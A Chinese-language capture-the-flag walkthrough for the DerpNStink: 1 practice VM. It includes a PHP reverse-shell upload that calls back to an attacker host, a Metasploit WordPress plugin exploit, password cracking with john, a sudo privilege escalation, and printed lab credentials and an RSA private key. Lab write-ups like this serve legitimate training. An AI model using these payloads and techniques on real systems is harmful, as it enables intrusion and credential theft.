DerpNStink: 1靶机攻略
各种扫描
- 演示中靶机IP:192.168.88.129
#可进入的网页
http://192.168.88.129/
http://192.168.88.129/weblog/wp-admin/
http://192.168.88.129/weblog/
http://192.168.88.129/robots.txt
http://192.168.88.129/temporary/
http://192.168.88.129/php/phpmyadmin/
翻网页
- 搜索到flag1
- 浅浅试出了一个密码
- 不是最新版本
- 可以文件上传
- phpmyadmin
企图建立连接
第一种:文件上传
- 先在kali打开监听
nc -lvvp 8888
- 利用之前找的上传入口上传
<?php
$sock = fsockopen('192.168.88.128',8888);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
?>
- 连接成功
第二种:扫描漏洞
- 使用WordPress漏洞扫描工具wpscan
wpscan --url http://derpnstink.local/weblog/
- 发现问题
slideshow gallery
- 找到攻击模块并使用
msfconsole
search slideshow gallery
use 0
set rhosts 192.168.88.129
set targeturi /weblog/
set wp_password admin
set wp_user admin
run
- 连接成功
- 进入shell
翻找文件
- 有两个用户:
mrderp
stinky
-
四处搜寻未果,想办法进入之前的数据库
-
在
/var/www/html/weblog
页面找到博客配置文件wp-config.php
- 发现数据库账户密码
root:mysql
进入数据库
- 破解密码:–在/usr/share/wordlists/ 目录下有个rockyou压缩包,解压后可做为字典使用,比较大
john who --wordlist=../usr/share/wordlists/rockyou.txt
#指定字典破解
$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 #Unclestinky:wedgie57
$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ #admin:admin
- 启用终端,尝试登入
python -c "import pty;pty.spawn('/bin/bash')"
- stinky尝试成功
翻用户文件
- 找到一个key.txt
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo4
2xba3Oo78y82svuAHBm6YScUos8dHUCTMLA+ogsmoDaJFghZEtQXugP8flgSk9cO
uJzOt9ih/MPmkjzfvDL9oW2Nh1XIctVfTZ6o8ZeJI8Sxh8Eguh+dw69M+Ad0Dimn
AKDPdL7z7SeWg1BJ1q/oIAtJnv7yJz2iMbZ6xOj6/ZDE/2trrrdbSyMc5CyA09/f
5xZ9f1ofSYhiCQ+dp9CTgH/JpKmdsZ21Uus8cbeGk1WpT6B+D8zoNgRxmO3/VyVB
LHXaio3hmxshttdFp4bFc3foTTSyJobGoFX+ewIDAQABAoIBACESDdS2H8EZ6Cqc
nRfehdBR2A/72oj3/1SbdNeys0HkJBppoZR5jE2o2Uzg95ebkiq9iPjbbSAXICAD
D3CVrJOoHxvtWnloQoADynAyAIhNYhjoCIA5cPdvYwTZMeA2BgS+IkkCbeoPGPv4
ZpHuqXR8AqIaKl9ZBNZ5VVTM7fvFVl5afN5eWIZlOTDf++VSDedtR7nL2ggzacNk
Q8JCK9mF62wiIHK5Zjs1lns4Ii2kPw+qObdYoaiFnexucvkMSFD7VAdfFUECQIyq
YVbsp5tec2N4HdhK/B0V8D4+6u9OuoiDFqbdJJWLFQ55e6kspIWQxM/j6PRGQhL0
DeZCLQECgYEA9qUoeblEro6ICqvcrye0ram38XmxAhVIPM7g5QXh58YdB1D6sq6X
VGGEaLxypnUbbDnJQ92Do0AtvqCTBx4VnoMNisce++7IyfTSygbZR8LscZQ51ciu
Qkowz3yp8XMyMw+YkEV5nAw9a4puiecg79rH9WSr4A/XMwHcJ2swloECgYEAyHn7
VNG/Nrc4/yeTqfrxzDBdHm+y9nowlWL+PQim9z+j78tlWX/9P8h98gOlADEvOZvc
fh1eW0gE4DDyRBeYetBytFc0kzZbcQtd7042/oPmpbW55lzKBnnXkO3BI2bgU9Br
7QTsJlcUybZ0MVwgs+Go1Xj7PRisxMSRx8mHbvsCgYBxyLulfBz9Um/cTHDgtTab
L0LWucc5KMxMkTwbK92N6U2XBHrDV9wkZ2CIWPejZz8hbH83Ocfy1jbETJvHms9q
cxcaQMZAf2ZOFQ3xebtfacNemn0b7RrHJibicaaM5xHvkHBXjlWN8e+b3x8jq2b8
gDfjM3A/S8+Bjogb/01JAQKBgGfUvbY9eBKHrO6B+fnEre06c1ArO/5qZLVKczD7
RTazcF3m81P6dRjO52QsPQ4vay0kK3vqDA+s6lGPKDraGbAqO+5paCKCubN/1qP1
14fUmuXijCjikAPwoRQ//5MtWiwuu2cj8Ice/PZIGD/kXk+sJXyCz2TiXcD/qh1W
pF13AoGBAJG43weOx9gyy1Bo64cBtZ7iPJ9doiZ5Y6UWYNxy3/f2wZ37D99NSndz
UBtPqkw0sAptqkjKeNtLCYtHNFJAnE0/uAGoAyX+SHhas0l2IYlUlk8AttcHP1kA
a4Id4FlCiJAXl3/ayyrUghuWWA3jMW3JgZdMyhU3OV+wyZz25S8o
-----END RSA PRIVATE KEY-----
- 一个.pcap文件
- flag3
查看数据包文件
- 找到密码 #找http中的post
mrderp:derpderpderpderpderpderpderp
sudo提权
- 在指定目录里创建文件
mkdir 。。。
# 创建目录
echo '/bin/sh' > derpy.sh
#也可以是"/bin/bash"等其他内容
chmod 777 derpy.sh
#赋权
sudo ./derpy.sh
#提权
注:
ssh -i key stinky@192.168.88.129
#使用密钥登录 key即密钥文件